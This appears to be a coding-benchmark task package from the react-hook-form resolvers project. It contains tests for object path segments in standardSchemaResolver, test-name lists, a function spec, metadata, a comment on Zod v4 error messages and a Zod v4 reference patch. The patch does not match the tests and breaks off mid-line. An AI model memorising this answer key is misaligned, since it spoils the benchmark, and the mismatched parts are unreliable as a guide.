diff --git a/standard-schema/src/__tests__/__fixtures__/data.ts b/standard-schema/src/__tests__/__fixtures__/data.ts index e37f521..a71f4c5 100644 --- a/standard-schema/src/__tests__/__fixtures__/data.ts +++ b/standard-schema/src/__tests__/__fixtures__/data.ts @@ -1,3 +1,4 @@ +import { StandardSchemaV1 } from '@standard-schema/spec'; import { Field, InternalFieldName } from 'react-hook-form'; import { z } from 'zod'; @@ -86,3 +87,25 @@ export const fields: Record<InternalFieldName, Field['_f']> = { name: 'birthday', }, }; + +export const customSchema: StandardSchemaV1< + StandardSchemaV1.InferInput<typeof schema>, + StandardSchemaV1.InferOutput<typeof schema> +> = { + '~standard': { + version: 1, + vendor: 'custom', + validate: () => ({ + issues: [ + { + path: [{ key: 'username' }], + message: 'Custom error', + }, + { + path: [{ key: 'like' }, { key: 0 }, { key: 'id' }], + message: 'Custom error', + }, + ], + }), + }, +}; diff --git a/standard-schema/src/__tests__/__snapshots__/standard-schema.ts.snap b/standard-schema/src/__tests__/__snapshots__/standard-schema.ts.snap index f8a68ff..2dba659 100644 --- a/standard-schema/src/__tests__/__snapshots__/standard-schema.ts.snap +++ b/standard-schema/src/__tests__/__snapshots__/standard-schema.ts.snap @@ -1,5 +1,29 @@ // Vitest Snapshot v1, https://vitest.dev/guide/snapshot.html +exports[`standardSchemaResolver > should correctly handle path segments that are objects 1`] = ` +{ + "errors": { + "like": [ + { + "id": { + "message": "Custom error", + "ref": undefined, + "type": "", + }, + }, + ], + "username": { + "message": "Custom error", + "ref": { + "name": "username", + }, + "type": "", + }, + }, + "values": {}, +} +`; + exports[`standardSchemaResolver > should return a single error from standardSchemaResolver when validation fails 1`] = ` { "errors": { diff --git a/standard-schema/src/__tests__/standard-schema.ts b/standard-schema/src/__tests__/standard-schema.ts index b99bfc1..46186b6 100644 --- 
a/standard-schema/src/__tests__/standard-schema.ts +++ b/standard-schema/src/__tests__/standard-schema.ts @@ -1,5 +1,11 @@ import { standardSchemaResolver } from '..'; -import { fields, invalidData, schema, validData } from './__fixtures__/data'; +import { + customSchema, + fields, + invalidData, + schema, + validData, +} from './__fixtures__/data'; const shouldUseNativeValidation = false; @@ -53,4 +59,16 @@ describe('standardSchemaResolver', () => { expect(validateSpy).toHaveBeenCalledTimes(1); expect(result).toMatchSnapshot(); }); + it('should correctly handle path segments that are objects', async () => { + const result = await standardSchemaResolver(customSchema)( + validData, + undefined, + { + fields, + shouldUseNativeValidation, + }, + ); + + expect(result).toMatchSnapshot(); + }); });
[ "typeschema/src/__tests__/Form.tsx > form's validation with TypeSchema and TypeScript's integration" ]
[ "valibot/src/__tests__/Form.tsx > form's validation with Valibot and TypeScript's integration", "typeschema/src/__tests__/typeschema.ts > typeschemaResolver > should return values from typeschemaResolver when validation pass & raw=true", "typeschema/src/__tests__/typeschema.ts > typeschemaResolver > should return parsed values from typeschemaResolver when validation pass", "typeschema/src/__tests__/typeschema.ts > typeschemaResolver > should return a single error from typeschemaResolver when validation fails", "typeschema/src/__tests__/typeschema.ts > typeschemaResolver > should return all the errors from typeschemaResolver when validation fails with `validateAllFieldCriteria` set to true", "joi/src/__tests__/joi.ts > joiResolver > should return values from joiResolver when validation pass", "joi/src/__tests__/joi.ts > joiResolver > should return values from joiResolver with `mode: sync` when validation pass", "joi/src/__tests__/joi.ts > joiResolver > should return a single error from joiResolver when validation fails", "joi/src/__tests__/joi.ts > joiResolver > should return a single error from joiResolver with `mode: sync` when validation fails", "joi/src/__tests__/joi.ts > joiResolver > should return all the errors from joiResolver when validation fails with `validateAllFieldCriteria` set to true", "joi/src/__tests__/joi.ts > joiResolver > should return all the errors from joiResolver when validation fails with `validateAllFieldCriteria` set to true and `mode: sync`", "joi/src/__tests__/joi.ts > joiResolver > should return values from joiResolver when validation pass and pass down the Joi context", "typeschema/src/__tests__/typeschema.ts > typeschemaResolver > should throw any error unrelated to TypeSchema", "computed-types/src/__tests__/Form.tsx > form's validation with computed-types and TypeScript's integration", "ajv/src/__tests__/ajv.ts > ajvResolver > should return values from ajvResolver when validation pass", "yup/src/__tests__/yup.ts > yupResolver > 
should return values from yupResolver when validation pass", "yup/src/__tests__/yup.ts > yupResolver > should return values from yupResolver with `mode: sync` when validation pass", "yup/src/__tests__/yup.ts > yupResolver > should return a single error from yupResolver when validation fails", "yup/src/__tests__/yup.ts > yupResolver > should return a single error from yupResolver with `mode: sync` when validation fails", "yup/src/__tests__/yup.ts > yupResolver > should return all the errors from yupResolver when validation fails with `validateAllFieldCriteria` set to true", "yup/src/__tests__/yup.ts > yupResolver > should return all the errors from yupResolver when validation fails with `validateAllFieldCriteria` set to true and `mode: sync`", "yup/src/__tests__/yup.ts > yupResolver > should return an error from yupResolver when validation fails and pass down the yup context", "yup/src/__tests__/yup.ts > yupResolver > should return correct error message with using yup.test", "yup/src/__tests__/yup.ts > yupResolver > should merge default yup resolver options with yup's options", "yup/src/__tests__/yup.ts > yupResolver > should throw an error without inner property", "yup/src/__tests__/yup.ts > yupResolver > should throw any error unrelated to Yup", "yup/src/__tests__/yup.ts > yupResolver > should return values from yupResolver when validation pass & raw=true", "yup/src/__tests__/yup.ts > yupResolver > shoud validate a lazy schema with success", "computed-types/src/__tests__/Form-native-validation.tsx > form's native validation with computed-types", "valibot/src/__tests__/Form-native-validation.tsx > form's native validation with Valibot", "superstruct/src/__tests__/Form-native-validation.tsx > form's native validation with Superstruct", "ajv/src/__tests__/ajv-errors.ts > ajvResolver with errorMessage > should return values when validation pass", "ajv/src/__tests__/ajv.ts > ajvResolver > should return values from ajvResolver with `mode: sync` when validation pass", 
"ajv/src/__tests__/ajv.ts > ajvResolver > should return single error message from ajvResolver when validation fails and validateAllFieldCriteria set to false", "vine/src/__tests__/Form.tsx > form's validation with Vine and TypeScript's integration", "yup/src/__tests__/Form.tsx > form's validation with Yup and TypeScript's integration", "fluentvalidation-ts/src/__tests__/Form.tsx > form's validation with Yup and TypeScript's integration", "ajv/src/__tests__/Form.tsx > form's validation with Ajv and TypeScript's integration", "ajv/src/__tests__/ajv-errors.ts > ajvResolver with errorMessage > should return customized error messages when validation fails", "ajv/src/__tests__/ajv-errors.ts > ajvResolver with errorMessage > should return customized error messages when requirement fails", "superstruct/src/__tests__/Form.tsx > form's validation with Superstruct and TypeScript's integration", "ajv/src/__tests__/ajv.ts > ajvResolver > should return single error message from ajvResolver when validation fails and validateAllFieldCriteria set to false and `mode: sync`", "ajv/src/__tests__/ajv.ts > ajvResolver > should return all the error messages from ajvResolver when validation fails and validateAllFieldCriteria set to true", "zod/src/__tests__/Form-native-validation.tsx > form's native validation with Zod", "vine/src/__tests__/Form-native-validation.tsx > form's native validation with Zod", "joi/src/__tests__/Form.tsx > form's validation with Joi and TypeScript's integration", "typanion/src/__tests__/Form.tsx > form's validation with Typanion and TypeScript's integration", "fluentvalidation-ts/src/__tests__/Form-native-validation.tsx > form's native validation with fluentvalidation-ts", "ajv/src/__tests__/ajv.ts > ajvResolver > should return all the error messages from ajvResolver when validation fails and validateAllFieldCriteria set to true and `mode: sync`", "ajv/src/__tests__/ajv.ts > ajvResolver > should return all the error messages from ajvResolver when requirement 
fails and validateAllFieldCriteria set to true", "ajv/src/__tests__/ajv-errors.ts > ajvResolver with errorMessage > should return customized error messages when some properties are undefined", "ajv/src/__tests__/ajv-errors.ts > ajvResolver with errorMessage > should return the same customized message when some properties are undefined", "ajv/src/__tests__/ajv-errors.ts > ajvResolver with errorMessage > should return the same customized message for all validation failures", "ajv/src/__tests__/ajv-errors.ts > ajvResolver with errorMessage > should return customized error messages for certain keywords when walidation fails", "ajv/src/__tests__/ajv-errors.ts > ajvResolver with errorMessage > should return the same customized error message when requirement fails", "ajv/src/__tests__/ajv-errors.ts > ajvResolver with errorMessage > should return customized error messages for certain keywords when requirement fails", "yup/src/__tests__/Form-native-validation.tsx > form's native validation with Yup", "ajv/src/__tests__/ajv.ts > ajvResolver > should return all the error messages from ajvResolver when requirement fails and validateAllFieldCriteria set to true and `mode: sync`", "ajv/src/__tests__/ajv.ts > ajvResolver > should return all the error messages from ajvResolver when some property is undefined and result will keep the input data structure", "joi/src/__tests__/Form-native-validation.tsx > form's native validation with Joi", "typanion/src/__tests__/Form-native-validation.tsx > form's native validation with Typanion", "ajv/src/__tests__/ajv-errors.ts > ajvResolver with errorMessage > should return customized error messages for certain keywords when some properties are undefined", "ajv/src/__tests__/ajv-errors.ts > ajvResolver with errorMessage > should return different messages for different properties when walidation fails", "ajv/src/__tests__/ajv-errors.ts > ajvResolver with errorMessage > should return different messages for different properties when requirement 
fails", "io-ts/src/__tests__/errorsToRecord.ts > errorsToRecord > should return a correct error for an exact intersection type error object", "io-ts/src/__tests__/errorsToRecord.ts > errorsToRecord > should return a correct error for a branded intersection", "typebox/src/__tests__/Form.tsx > form's validation with Typebox and TypeScript's integration", "arktype/src/__tests__/Form.tsx > form's validation with arkType and TypeScript's integration", "ajv/src/__tests__/ajv-errors.ts > ajvResolver with errorMessage > should return different messages for different properties when some properties are undefined", "ajv/src/__tests__/ajv-errors.ts > ajvResolver with errorMessage > should return customized errors for properties/items when walidation fails", "ajv/src/__tests__/ajv-errors.ts > ajvResolver with errorMessage > should return customized errors for properties/items when requirement fails", "nope/src/__tests__/Form.tsx > form's validation with Yup and TypeScript's integration", "vest/src/__tests__/Form.tsx > form's validation with Vest and TypeScript's integration", "arktype/src/__tests__/Form-native-validation.tsx > form's native validation with Arktype", "class-validator/src/__tests__/Form-native-validation.tsx > form's native validation with Class Validator", "zod/src/__tests__/Form.tsx > form's validation with Zod and TypeScript's integration", "ajv/src/__tests__/ajv-errors.ts > ajvResolver with errorMessage > should return customized errors for properties/items when some properties are undefined", "ajv/src/__tests__/ajv-errors.ts > ajvResolver with errorMessage > should return a default message if there is no specific message for the error when walidation fails", "ajv/src/__tests__/ajv-errors.ts > ajvResolver with errorMessage > should return a default message if there is no specific message for the error when requirement fails", "ajv/src/__tests__/ajv-errors.ts > ajvResolver with errorMessage > should return a default message if there is no specific message for 
the error when some properties are undefined", "class-validator/src/__tests__/class-validator.ts > classValidatorResolver > should return values from classValidatorResolver when validation pass", "class-validator/src/__tests__/class-validator.ts > classValidatorResolver > should return values as a raw object from classValidatorResolver when `rawValues` set to true", "class-validator/src/__tests__/class-validator.ts > classValidatorResolver > should return values from classValidatorResolver with `mode: sync` when validation pass", "class-validator/src/__tests__/class-validator.ts > classValidatorResolver > should return a single error from classValidatorResolver when validation fails", "class-validator/src/__tests__/class-validator.ts > classValidatorResolver > should return a single error from classValidatorResolver with `mode: sync` when validation fails", "class-validator/src/__tests__/class-validator.ts > classValidatorResolver > should return all the errors from classValidatorResolver when validation fails with `validateAllFieldCriteria` set to true", "class-validator/src/__tests__/class-validator.ts > classValidatorResolver > should return all the errors from classValidatorResolver when validation fails with `validateAllFieldCriteria` set to true and `mode: sync`", "typebox/src/__tests__/Form-native-validation-compiler.tsx > form's native validation with Typebox (with compiler)", "class-validator/src/__tests__/class-validator.ts > validate data with transformer option", "class-validator/src/__tests__/class-validator.ts > validate data with validator option", "class-validator/src/__tests__/class-validator.ts > should return from classValidatorResolver with `excludeExtraneousValues` set to true", "class-validator/src/__tests__/Form.tsx > form's validation with Class Validator and TypeScript's integration", "vest/src/__tests__/Form-native-validation.tsx > form's native validation with Vest", "nope/src/__tests__/Form-native-validation.tsx > form's native 
validation with Nope", "typebox/src/__tests__/Form-native-validation.tsx > form's native validation with Typebox", "typebox/src/__tests__/Form-compiler.tsx > form's validation with Typebox (with compiler) and TypeScript's integration", "effect-ts/src/__tests__/effect-ts.ts > effectTsResolver > should return values from effectTsResolver when validation pass", "effect-ts/src/__tests__/effect-ts.ts > effectTsResolver > should return a single error from effectTsResolver when validation fails", "effect-ts/src/__tests__/effect-ts.ts > effectTsResolver > should return the first error from effectTsResolver when validation fails with `validateAllFieldCriteria` set to firstError", "effect-ts/src/__tests__/effect-ts.ts > effectTsResolver > should return all the errors from effectTsResolver when validation fails with `validateAllFieldCriteria` set to true", "ajv/src/__tests__/Form-native-validation.tsx > form's native validation with Ajv", "io-ts/src/__tests__/Form.tsx > form's validation with io-ts and TypeScript's integration", "io-ts/src/__tests__/Form-native-validation.tsx > form's native validation with io-ts", "effect-ts/src/__tests__/Form.tsx > form's validation with Zod and TypeScript's integration", "valibot/src/__tests__/valibot.ts > valibotResolver > should return parsed values from valibotResolver with `mode: sync` when validation pass", "valibot/src/__tests__/valibot.ts > valibotResolver > should return a single error from valibotResolver with `mode: sync` when validation fails", "valibot/src/__tests__/valibot.ts > valibotResolver > should return values from valibotResolver when validation pass", "valibot/src/__tests__/valibot.ts > valibotResolver > should return a single error from valibotResolver when validation fails", "valibot/src/__tests__/valibot.ts > valibotResolver > should return values from valibotResolver when validation pass & raw=true", "valibot/src/__tests__/valibot.ts > valibotResolver > should return all the errors from valibotResolver when 
validation fails with `validateAllFieldCriteria` set to true", "valibot/src/__tests__/valibot.ts > valibotResolver > should return all the errors from valibotResolver when validation fails with `validateAllFieldCriteria` set to true and `mode: sync`", "valibot/src/__tests__/valibot.ts > valibotResolver > should be able to validate variants without errors", "valibot/src/__tests__/valibot.ts > valibotResolver > should be able to validate variants with errors", "effect-ts/src/__tests__/Form-native-validation.tsx > form's native validation with effect-ts", "vest/src/__tests__/vest.ts > vestResolver > should return values from vestResolver when validation pass", "vest/src/__tests__/vest.ts > vestResolver > should return values from vestResolver with `mode: sync` when validation pass", "vest/src/__tests__/vest.ts > vestResolver > should return single error message from vestResolver when validation fails and validateAllFieldCriteria set to false", "vest/src/__tests__/vest.ts > vestResolver > should return single error message from vestResolver when validation fails and validateAllFieldCriteria set to false and `mode: sync`", "vest/src/__tests__/vest.ts > vestResolver > should return all the error messages from vestResolver when validation fails and validateAllFieldCriteria set to true", "vest/src/__tests__/vest.ts > vestResolver > should return all the error messages from vestResolver when validation fails and validateAllFieldCriteria set to true and `mode: sync`", "vest/src/__tests__/vest.ts > vestResolver > should call a suite with values, validated field names and a context as arguments", "zod/src/__tests__/zod.ts > zodResolver > should return values from zodResolver when validation pass & raw=true", "zod/src/__tests__/zod.ts > zodResolver > should return parsed values from zodResolver with `mode: sync` when validation pass", "zod/src/__tests__/zod.ts > zodResolver > should return a single error from zodResolver when validation fails", "zod/src/__tests__/zod.ts > 
zodResolver > should return a single error from zodResolver with `mode: sync` when validation fails", "zod/src/__tests__/zod.ts > zodResolver > should return all the errors from zodResolver when validation fails with `validateAllFieldCriteria` set to true", "zod/src/__tests__/zod.ts > zodResolver > should return all the errors from zodResolver when validation fails with `validateAllFieldCriteria` set to true and `mode: sync`", "zod/src/__tests__/zod.ts > zodResolver > should throw any error unrelated to Zod", "vine/src/__tests__/vine.ts > vineResolver > should return values from vineResolver when validation pass", "vine/src/__tests__/vine.ts > vineResolver > should return a single error from vineResolver when validation fails", "vine/src/__tests__/vine.ts > vineResolver > should return all the errors from vineResolver when validation fails with `validateAllFieldCriteria` set to true", "vine/src/__tests__/vine.ts > vineResolver > should return values from vineResolver when validation pass & raw=true", "src/__tests__/toNestErrors.ts > transforms flat object to nested object", "src/__tests__/toNestErrors.ts > transforms flat object to nested object and shouldUseNativeValidation: true", "src/__tests__/toNestErrors.ts > transforms flat object to nested object with names option", "src/__tests__/toNestErrors.ts > transforms flat object to nested object with root error for field array", "src/__tests__/toNestErrors.ts > ensures consistent ordering when a field array has a root error and an error in the non-first element", "src/__tests__/validateFieldsNatively.ts > validates natively fields", "typanion/src/__tests__/typanion.ts > typanionResolver > should return values from typanionResolver when validation pass", "typanion/src/__tests__/typanion.ts > typanionResolver > should return a single error from typanionResolver when validation fails", "fluentvalidation-ts/src/__tests__/fluentvalidation-ts.ts > fluentValidationResolver > should return values from 
fluentValidationResolver when validation pass", "fluentvalidation-ts/src/__tests__/fluentvalidation-ts.ts > fluentValidationResolver > should return values from fluentValidationResolver with `mode: sync` when validation pass", "fluentvalidation-ts/src/__tests__/fluentvalidation-ts.ts > fluentValidationResolver > should return a single error from fluentValidationResolver when validation fails", "fluentvalidation-ts/src/__tests__/fluentvalidation-ts.ts > fluentValidationResolver > should return a single error from fluentValidationResolver with `mode: sync` when validation fails", "fluentvalidation-ts/src/__tests__/fluentvalidation-ts.ts > fluentValidationResolver > should return all the errors from fluentValidationResolver when validation fails with `validateAllFieldCriteria` set to true", "fluentvalidation-ts/src/__tests__/fluentvalidation-ts.ts > fluentValidationResolver > should return all the errors from fluentValidationResolver when validation fails with `validateAllFieldCriteria` set to true and `mode: sync`", "fluentvalidation-ts/src/__tests__/fluentvalidation-ts.ts > fluentValidationResolver > should return values from fluentValidationResolver when validation pass & raw=true", "computed-types/src/__tests__/computed-types.ts > computedTypesResolver > should return values from computedTypesResolver when validation pass", "computed-types/src/__tests__/computed-types.ts > computedTypesResolver > should return a single error from computedTypesResolver when validation fails", "computed-types/src/__tests__/computed-types.ts > computedTypesResolver > should throw any error unrelated to computed-types", "io-ts/src/__tests__/io-ts.ts > ioTsResolver > should return values from ioTsResolver when validation pass", "io-ts/src/__tests__/io-ts.ts > ioTsResolver > should return a single error from ioTsResolver when validation fails", "io-ts/src/__tests__/io-ts.ts > ioTsResolver > should return all the errors from ioTsResolver when validation fails with 
`validateAllFieldCriteria` set to true", "nope/src/__tests__/nope.ts > nopeResolver > should return values from nopeResolver when validation pass", "nope/src/__tests__/nope.ts > nopeResolver > should return a single error from nopeResolver when validation fails", "superstruct/src/__tests__/superstruct.ts > superstructResolver > should return values from superstructResolver when validation pass", "superstruct/src/__tests__/superstruct.ts > superstructResolver > should return a single error from superstructResolver when validation fails", "superstruct/src/__tests__/superstruct.ts > superstructResolver > should return values from superstructResolver when validation pass & raw=true", "typebox/src/__tests__/typebox-compiler.ts > typeboxResolver (with compiler) > should return a single error from typeboxResolver when validation fails", "typebox/src/__tests__/typebox-compiler.ts > typeboxResolver (with compiler) > should return all the errors from typeboxResolver when validation fails with `validateAllFieldCriteria` set to true", "typebox/src/__tests__/typebox-compiler.ts > typeboxResolver (with compiler) > should validate with success", "typebox/src/__tests__/typebox.ts > typeboxResolver > should return a single error from typeboxResolver when validation fails", "typebox/src/__tests__/typebox.ts > typeboxResolver > should return all the errors from typeboxResolver when validation fails with `validateAllFieldCriteria` set to true", "typebox/src/__tests__/typebox.ts > typeboxResolver > should validate with success", "arktype/src/__tests__/arktype.ts > arktypeResolver > should return values from arktypeResolver when validation pass & raw=true", "arktype/src/__tests__/arktype.ts > arktypeResolver > should return a single error from arktypeResolver when validation fails" ]
Function: standardSchemaResolver<Schema extends StandardSchemaV1<FieldValues>>(schema: Schema, resolverOptions?: { raw?: boolean }) Location: exported from `standard-schema/src/standard-schema.ts` Inputs: - `schema`: a Standard Schema V1 definition whose `~standard.validate` method is used for validation. - `resolverOptions` (optional): object with a boolean `raw` flag (currently unsupported, kept for signature compatibility). - Returned resolver function receives:   - `values`: the form data (`FieldValues`).   - `_`: placeholder for context (unused).   - `options`: `ResolverOptions` from React Hook Form (e.g., `fields`, `shouldUseNativeValidation`). Outputs: - Returns a `Resolver` whose resolved value conforms to `StandardSchemaV1.InferOutput<Schema>`, i.e., an object `{ errors: Record<string, FieldError>, values: Partial<TFieldValues> }`. - If validation fails, `errors` contains field‑wise `FieldError` objects; otherwise `values` holds the validated data. Description: Creates a React Hook Form resolver that validates form data using a Standard Schema V1 specification. The resolver extracts error paths using `getDotPath` to correctly handle path segments that may be objects, making it suitable for schemas that emit complex path information. It is explicitly exercised in tests via `standardSchemaResolver(customSchema)(validData, undefined, { fields, shouldUseNativeValidation })`.
MIT
{ "base_image_name": "node_20", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "npx vitest run --reporter=verbose --color=false" }
{ "num_modified_files": 4, "num_modified_lines": 10, "pr_author": "EskiMojo14", "pr_labels": [], "llm_metadata": { "code": "A", "code_quality": null, "confidence": 0.97, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": false, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [], "intent_completeness": "complete", "patch": null, "pr_categories": [ "minor_bug" ], "reason": null, "reasoning": "The issue asks to correctly handle path segments that are objects by using getDotPath from @standard-schema/utils. The tests add a custom schema with object path segments and verify the resolver returns errors with proper field names, matching the described behavior. Tests align with the requirement and no unrelated test interactions are introduced. There are no signals of B‑category problems, so the task is cleanly solvable.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, 
"test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
3bc2ad50a63ef8c114336403f182a32e2df7552d
2025-06-05 02:44:16
Jamess-Lucass: I've noticed the error messages returned from the form errors has changed when referencing zod/v4. ```typescript import { useForm } from "react-hook-form"; import { zodResolver } from "@hookform/resolvers/zod"; import { z } from "zod"; const formSchema = z.object({ firstname: z.string().max(2), }); type FormData = z.infer<typeof formSchema>; function App() { const { register, handleSubmit, formState: { errors, isSubmitting }, } = useForm<FormData>({ resolver: zodResolver(formSchema), }); const onSubmit = (data: FormData) => { console.log("Form data:", data); }; return ( <div> <form onSubmit={handleSubmit(onSubmit)}> <label>First Name:</label> <input id="firstname" type="text" {...register("firstname")} /> <button type="submit" disabled={isSubmitting}> Submit </button> </form> <p>{errors.firstname?.message}</p> </div> ); } export default App; ``` The the input "longer_than_2_chars" `errors.firstname?.message` would return "String must contain at most 2 character(s)", which i would expect. when updating the import to `import { z } from "zod/v4";` `errors.firstname?.message` now just returns "Invalid input". It doesn't seem to get the underlying zod error message anymore.
react-hook-form__resolvers-777
diff --git a/README.md b/README.md index 9ae0fd4..9fa6f4d 100644 --- a/README.md +++ b/README.md @@ -68,7 +68,7 @@ Example: ```tsx import { useForm } from 'react-hook-form'; import { zodResolver } from '@hookform/resolvers/zod'; -import { z } from 'zod'; +import { z } from 'zod'; // or 'zod/v4' const schema = z.object({ id: z.number(), @@ -175,7 +175,7 @@ const App = () => { }; ``` -### [Zod](https://github.com/vriad/zod) +### [Zod](https://github.com/colinhacks/zod) TypeScript-first schema validation with static type inference @@ -186,7 +186,7 @@ TypeScript-first schema validation with static type inference ```tsx import { useForm } from 'react-hook-form'; import { zodResolver } from '@hookform/resolvers/zod'; -import { z } from 'zod'; +import { z } from 'zod'; // or 'zod/v4' const schema = z.object({ name: z.string().min(1, { message: 'Required' }), diff --git a/bun.lock b/bun.lock index 529290a..6fbd1cf 100644 --- a/bun.lock +++ b/bun.lock @@ -54,7 +54,7 @@ "vite-tsconfig-paths": "^5.1.4", "vitest": "^3.0.9", "yup": "^1.6.1", - "zod": "^3.24.2", + "zod": "^3.25.0", }, "peerDependencies": { "react-hook-form": "^7.55.0", @@ -1444,7 +1444,7 @@ "yup": ["yup@1.6.1", "", { "dependencies": { "property-expr": "^2.0.5", "tiny-case": "^1.0.3", "toposort": "^2.0.2", "type-fest": "^2.19.0" } }, "sha512-JED8pB50qbA4FOkDol0bYF/p60qSEDQqBD0/qeIrUCG1KbPBIQ776fCUNb9ldbPcSTxA69g/47XTo4TqWiuXOA=="], - "zod": ["zod@3.24.2", "", {}, "sha512-lY7CDW43ECgW9u1TcT3IoXHflywfVqDYze4waEz812jR/bZ8FHDsl7pFQoSZTz5N+2NqRXs8GBwnAwo3ZNxqhQ=="], + "zod": ["zod@3.25.51", "", {}, "sha512-TQSnBldh+XSGL+opiSIq0575wvDPqu09AqWe1F7JhUMKY+M91/aGlK4MhpVNO7MgYfHcVCB1ffwAUTJzllKJqg=="], "@asamuzakjp/css-color/lru-cache": ["lru-cache@10.4.3", "", {}, "sha512-JNAzZcXrCt42VGLuYz0zfAzDfAvJWW6AfYlDBQyDV5DClI2m5sAmK+OIO7s59XfsRsWHp02jAJrRadPRGTt6SQ=="], diff --git a/package.json b/package.json index e6cfb9d..7319445 100644 --- a/package.json +++ b/package.json @@ -314,7 +314,7 @@ "vite-tsconfig-paths": "^5.1.4", 
"vitest": "^3.0.9", "yup": "^1.6.1", - "zod": "^3.24.2" + "zod": "^3.25.0" }, "peerDependencies": { "react-hook-form": "^7.55.0" diff --git a/typeschema/src/typeschema.ts b/typeschema/src/typeschema.ts index 0891a57..bba859b 100644 --- a/typeschema/src/typeschema.ts +++ b/typeschema/src/typeschema.ts @@ -1,4 +1,5 @@ import { toNestErrors, validateFieldsNatively } from '@hookform/resolvers'; +import { StandardSchemaV1 } from '@standard-schema/spec'; import { FieldError, FieldErrors, @@ -6,7 +7,6 @@ import { Resolver, appendErrors, } from 'react-hook-form'; -import { StandardSchemaV1 } from 'zod/lib/standard-schema'; const parseErrorSchema = ( typeschemaErrors: readonly StandardSchemaV1.Issue[], diff --git a/zod/src/zod.ts b/zod/src/zod.ts index 064dcfd..0e227eb 100644 --- a/zod/src/zod.ts +++ b/zod/src/zod.ts @@ -8,13 +8,29 @@ import { ResolverSuccess, appendErrors, } from 'react-hook-form'; -import { ZodError, z } from 'zod'; +import * as z3 from 'zod/v3'; +import * as z4 from 'zod/v4/core'; -const isZodError = (error: any): error is ZodError => - Array.isArray(error?.errors); +const isZod3Error = (error: any): error is z3.ZodError => { + return Array.isArray(error?.issues); +}; +const isZod3Schema = (schema: any): schema is z3.ZodSchema => { + return ( + '_def' in schema && + typeof schema._def === 'object' && + 'typeName' in schema._def + ); +}; +const isZod4Error = (error: any): error is z4.$ZodError => { + // instanceof is safe in Zod 4 (uses Symbol.hasInstance) + return error instanceof z4.$ZodError; +}; +const isZod4Schema = (schema: any): schema is z4.$ZodType => { + return '_zod' in schema && typeof schema._zod === 'object'; +}; -function parseErrorSchema( - zodErrors: z.ZodIssue[], +function parseZod3Issues( + zodErrors: z3.ZodIssue[], validateAllFieldCriteria: boolean, ) { const errors: Record<string, FieldError> = {}; @@ -63,37 +79,156 @@ function parseErrorSchema( return errors; } +function parseZod4Issues( + zodErrors: z4.$ZodIssue[], + 
validateAllFieldCriteria: boolean, +) { + const errors: Record<string, FieldError> = {}; + // const _zodErrors = zodErrors as z4.$ZodISsue; // + for (; zodErrors.length; ) { + const error = zodErrors[0]; + const { code, message, path } = error; + const _path = path.join('.'); + + if (!errors[_path]) { + if (error.code === 'invalid_union') { + const unionError = error.errors[0][0]; + + errors[_path] = { + message: unionError.message, + type: unionError.code, + }; + } else { + errors[_path] = { message, type: code }; + } + } + + if (error.code === 'invalid_union') { + error.errors.forEach((unionError) => + unionError.forEach((e) => zodErrors.push(e)), + ); + } + + if (validateAllFieldCriteria) { + const types = errors[_path].types; + const messages = types && types[error.code]; + + errors[_path] = appendErrors( + _path, + validateAllFieldCriteria, + errors, + code, + messages + ? ([] as string[]).concat(messages as string[], error.message) + : error.message, + ) as FieldError; + } + + zodErrors.shift(); + } + + return errors; +} + +type RawResolverOptions = { + mode?: 'async' | 'sync'; + raw: true; +}; +type NonRawResolverOptions = { + mode?: 'async' | 'sync'; + raw?: false; +}; + +// minimal interfaces to avoid asssignability issues between versions +interface Zod3Type<O = unknown, I = unknown> { + _output: O; + _input: I; + _def: { + typeName: string; + }; +} + +// some type magic to make versions pre-3.25.0 still work +type IsUnresolved<T> = PropertyKey extends keyof T ? true : false; +type UnresolvedFallback<T, Fallback> = IsUnresolved<typeof z3> extends true + ? 
Fallback + : T; +type FallbackIssue = { + code: string; + message: string; + path: (string | number)[]; +}; +type Zod3ParseParams = UnresolvedFallback< + z3.ParseParams, + // fallback if user is on <3.25.0 + { + path?: (string | number)[]; + errorMap?: ( + iss: FallbackIssue, + ctx: { + defaultError: string; + data: any; + }, + ) => { message: string }; + async?: boolean; + } +>; +type Zod4ParseParams = UnresolvedFallback< + z4.ParseContext<z4.$ZodIssue>, + // fallback if user is on <3.25.0 + { + readonly error?: ( + iss: FallbackIssue, + ) => null | undefined | string | { message: string }; + readonly reportInput?: boolean; + readonly jitless?: boolean; + } +>; + export function zodResolver<Input extends FieldValues, Context, Output>( - schema: z.ZodSchema<Output, any, Input>, - schemaOptions?: Partial<z.ParseParams>, - resolverOptions?: { - mode?: 'async' | 'sync'; - raw?: false; - }, + schema: Zod3Type<Output, Input>, + schemaOptions?: Zod3ParseParams, + resolverOptions?: NonRawResolverOptions, ): Resolver<Input, Context, Output>; - export function zodResolver<Input extends FieldValues, Context, Output>( - schema: z.ZodSchema<Output, any, Input>, - schemaOptions: Partial<z.ParseParams> | undefined, - resolverOptions: { - mode?: 'async' | 'sync'; - raw: true; - }, + schema: Zod3Type<Output, Input>, + schemaOptions: Zod3ParseParams | undefined, + resolverOptions: RawResolverOptions, ): Resolver<Input, Context, Input>; - +// the Zod 4 overloads need to be generic for complicated reasons +export function zodResolver< + Input extends FieldValues, + Context, + Output, + T extends z4.$ZodType<Output, Input> = z4.$ZodType<Output, Input>, +>( + schema: T, + schemaOptions?: Zod4ParseParams, // already partial + resolverOptions?: NonRawResolverOptions, +): Resolver<z4.input<T>, Context, z4.output<T>>; +export function zodResolver< + Input extends FieldValues, + Context, + Output, + T extends z4.$ZodType<Output, Input> = z4.$ZodType<Output, Input>, +>( + schema: 
